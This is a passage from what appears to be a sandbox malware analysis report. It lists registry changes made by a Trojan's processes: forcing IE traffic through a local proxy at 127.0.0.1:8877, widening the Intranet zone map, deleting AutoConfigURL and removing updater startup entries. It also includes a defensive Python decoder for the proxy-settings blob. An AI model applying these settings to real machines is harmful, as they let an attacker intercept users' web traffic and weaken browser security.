"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 81 CC 69 43 B2 FD B1 98 C5 CD 37 86 53 60 D6"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are treated as belonging to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone, i.e. host names without dots, are treated as belonging to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan removes the following values from the machine-wide Run key, which disables the automatic startup of the programs they belong to (the Adobe Reader updater, the VMware Tools user process and the Java update scheduler):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"

"VMware User Process"

"SunJavaUpdateSched"
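The "SavedLegacySettings" values in this report (second DWORD 1F, 20, 21 and 22 for wcheckf.exe, winonit.exe, vchk.exe:232 and EG9650tGGrxO3Ey respectively) are the first 16 bytes of WinINet's binary connection-settings blob. As an added example that is not part of the original report, the Python below decodes that header using the widely documented but unofficial layout, assumed here: four little-endian DWORDs (structure version, change counter, flags, proxy-string length), then the proxy string, a length-prefixed bypass list and a length-prefixed auto-config URL. It cross-checks the header against the ProxyServer value written alongside it: the fourth DWORD 0x28 = 40 is exactly the length of "http=127.0.0.1:8877;https=127.0.0.1:8877", and flags 0x03 is direct + manual proxy. If the second DWORD is, as commonly documented, incremented on every change, it also gives the order in which the four processes rewrote the proxy settings.

```python
"""Added example (not part of the original report): decode the WinINet
connection-settings blob shown as "SavedLegacySettings" (same layout as
DefaultConnectionSettings). Assumed layout, widely documented but unofficial:
DWORD version, DWORD change counter, DWORD flags, DWORD proxy length, proxy
string, DWORD bypass length, bypass list, DWORD PAC length, PAC URL, padding.
The report prints only the first 16 bytes, so only the header is decoded
from the page value; the encoder/decoder pair shows the rest of the layout."""
import struct

FLAGS = ((1, "DIRECT"), (2, "PROXY"), (4, "PAC_URL"), (8, "AUTODETECT"))
FLAG_PROXY = 2

# First 16 bytes exactly as printed in the report for winonit.exe:892,
# and the ProxyServer value written by the same process.
WINONIT_PREFIX = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"
PROXY_SERVER = "http=127.0.0.1:8877;https=127.0.0.1:8877"


def parse_hex_dump(text):
    """Turn the report's space-separated hex into bytes."""
    return bytes.fromhex(text.replace(" ", ""))


def decode_header(blob):
    """Decode the 16-byte header; works on the truncated value from the page."""
    if len(blob) < 16:
        raise ValueError("need at least 16 bytes")
    version, counter, flags, proxy_len = struct.unpack_from("<4I", blob, 0)
    return {"version": version, "counter": counter, "flags": flags,
            "flag_names": [name for bit, name in FLAGS if flags & bit],
            "proxy_len": proxy_len}


def corroborate(header, proxy_server):
    """True when the manual-proxy flag is set and the header's proxy-string
    length equals the length of the ProxyServer value written alongside it."""
    return bool(header["flags"] & FLAG_PROXY) and \
        header["proxy_len"] == len(proxy_server.encode("ascii"))


def encode_settings(counter, flags, proxy="", bypass="", pac_url="", version=0x3C):
    """Build a complete blob in the assumed layout."""
    out = struct.pack("<4I", version, counter, flags, len(proxy)) + proxy.encode("ascii")
    for s in (bypass, pac_url):
        out += struct.pack("<I", len(s)) + s.encode("ascii")
    return out + b"\0" * 32            # trailing reserved/zero bytes


def decode_settings(blob):
    """Decode a complete blob: header plus the three length-prefixed strings."""
    info = decode_header(blob)
    off, length, strings = 16, info["proxy_len"], []
    for i in range(3):
        if i:                          # bypass list and PAC URL carry their own length
            (length,) = struct.unpack_from("<I", blob, off)
            off += 4
        strings.append(blob[off:off + length].decode("ascii"))
        off += length
    info.update(proxy=strings[0], bypass=strings[1], pac_url=strings[2])
    return info


if __name__ == "__main__":
    hdr = decode_header(parse_hex_dump(WINONIT_PREFIX))
    print(hdr, "consistent with ProxyServer:", corroborate(hdr, PROXY_SERVER))
```

When triaging a live host, compare the header's proxy length with the ProxyServer string the same way: a mismatch means the two values were not written together and one of them is stale.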

The process getcap.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry. Note that the RNG "Seed" and MountPoints2 "BaseClass" entries here, and in the WMIC.exe, wincheckfe.exe, vchk.exe:456 and taskkill.exe sections below, are side effects of CryptoAPI re-seeding its random number generator and of Explorer enumerating drives; any process that uses those APIs produces them, so they are not indicators of this sample:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F A9 84 23 6B 03 17 EC 1F 8E 49 6A 3F 1B DC 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process WMIC.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 D4 A4 E9 E9 EC 4F CB 7A 28 48 65 03 62 92 55"

The process wincheckfe.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 4C 97 BD F1 4C CF 7D 20 F4 16 C7 29 EC A2 45"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wcheckf.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 B0 F4 9F 47 9C 00 B6 03 D1 17 90 EC D4 24 47"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are treated as belonging to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone, i.e. host names without dots, are treated as belonging to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 DF D6 EE 40 84 F1 92 1E EC 7E 2F D8 47 97 C8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are treated as belonging to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone, i.e. host names without dots, are treated as belonging to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB FF 15 8E D9 C8 0A 62 44 14 2D FD 63 D3 D3 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process taskkill.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 BF 34 40 63 39 ED B4 D8 B3 A3 4E 9E 3D 80 9A"

The process taskkill.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED F1 52 39 4E B8 F9 1E 39 4B 3F 36 EB FB F6 6A"

The process taskkill.exe:3712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 64 82 5A 43 CE 50 84 F9 06 94 CD BF 2E 2B 85"

The process taskkill.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 39 98 4A 14 68 70 5E B7 2F 62 4D BD 9D 47 E2"

The process taskkill.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 2C 91 77 80 43 5E 2D 36 FA 70 38 CB F4 87 77"

The process taskkill.exe:3288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB AD 55 B7 EC EF 2A 83 BF 51 30 8B D5 0D 04 61"

The process taskkill.exe:2968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 02 BF 02 23 4D 40 3B EE EE 68 AB 27 C7 C6 58"

The process taskkill.exe:2524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 0E B5 34 EE 0C FF 18 90 A0 2E 1A 0E 60 C3 7D"

The process taskkill.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 54 6A FB EE 2C D6 3C EB FE 3B 31 47 29 8E 43"

The process taskkill.exe:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F E1 07 E9 BB 2E F0 61 C0 7A 5A 4B 53 06 0D ED"

The process taskkill.exe:2324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 78 82 FF BD A4 5E 9D 35 3B D7 18 A3 DF 74 C6"

The process taskkill.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF B5 63 64 FC 80 D3 A4 B2 42 D2 89 2B 34 B0 A1"

The process taskkill.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 32 9F 11 01 32 8B 56 45 4E E9 6D AC 63 A6 55"

The process taskkill.exe:2248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 7A AD 59 AD 52 2E 05 24 4B 46 02 A1 08 38 93"

The process taskkill.exe:2400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E A3 1F 23 A4 08 70 F1 FC 3F D6 E8 6A 00 F5 89"

The process taskkill.exe:2292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 79 7D 68 DB 16 7F 49 36 3A 40 D3 9A D5 66 B9"

The process taskkill.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 45 E8 28 89 29 16 C2 3A 6C E5 1D B7 52 18 C1"

The process taskkill.exe:2844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 0A F0 94 17 E4 E5 0F 03 2F 30 2D 16 48 7E 02"

The process taskkill.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 05 B3 F2 71 36 6D CF A7 0C AE BB A0 7B 10 22"

The process taskkill.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 84 2D 08 37 83 42 60 13 08 49 D6 4F 27 66 C9"

The process taskkill.exe:3488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 4D 76 93 5E 12 64 93 5C 78 4C 3E 4A 63 A8 01"

The process taskkill.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 B1 BD 14 A9 B9 6D 24 8A 8A BF F3 4D EF 4D F4"

The process taskkill.exe:3764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 46 DE 11 15 9B C6 7A 08 5A 8A 9A 81 59 ED"

The process taskkill.exe:2708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 11 40 78 DF AA 6C 31 4A 02 A5 7A 21 19 A9 47"

The process taskkill.exe:3832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 3B 29 9C 2B 10 9F 96 2D 88 91 14 4D A9 96 23"

The process taskkill.exe:2852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 05 9C F5 A9 2C 39 34 FB CA 73 41 91 86 3E 9A"

The process taskkill.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 82 80 91 93 8C B3 77 82 CD 20 3F E8 77 86 F5"

The process taskkill.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D DD C0 37 54 67 5E A3 DE 00 2C 89 0B BD 21 9B"

The process taskkill.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D4 D5 68 46 3A 7A B1 98 C1 6A E8 98 EF A3 5D"

The process taskkill.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 25 89 05 04 CC E2 F0 B2 98 70 6E D8 01 C5 5E"

The process taskkill.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 75 F5 2C 19 CE 1A AC E9 F7 8D DF 48 9B 43 3E"

The process taskkill.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 4E 5C 52 5E 76 05 91 D2 4A 3C 15 C9 9D C1 F3"

The process taskkill.exe:2996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 19 45 7F 07 43 C8 96 DD 11 DF C2 6F 49 F9 BE"

The process taskkill.exe:3244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3C 44 E5 0A EF 96 F5 7F 11 CE E7 1A D9 11 9A"

The process taskkill.exe:4080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C C5 D1 B9 2A 2E 4F 75 76 42 2C 47 01 0B 21 FA"

The process taskkill.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 0E 4F 51 FA BB 77 D0 64 81 44 D6 2A 67 5E 0B"

The process taskkill.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B7 74 8C 99 CA 12 6C 1F A2 F7 9C 6A 5C 95 62"

The process taskkill.exe:412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 15 4E 58 67 AF AC 66 35 04 F0 40 3F DA 03 16"

The process taskkill.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 3B 0B A1 80 2A 7C 1A AB 63 3B 75 CF 32 C0 4E"

The process taskkill.exe:2148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 EC 1D 0A 28 ED 4B 7E 22 10 E2 C0 F8 3C 85 ED"

The process taskkill.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 9C B9 C3 F6 FC 1E B4 81 5B 1F AB 67 50 24 11"

The process taskkill.exe:2476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 A6 15 15 C8 1C C7 ED D5 D7 1C 1B A1 88 A4 20"

The process taskkill.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 8D BF 7E D1 96 5A 2D 3A 55 9A CC DC CD 8C DD"

The process taskkill.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 45 35 20 B5 88 93 90 4F 03 96 85 D1 73 87 D8"

The process taskkill.exe:3276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 53 49 FA 25 68 84 6C C9 0E DA 48 60 E3 67 F7"

The process taskkill.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

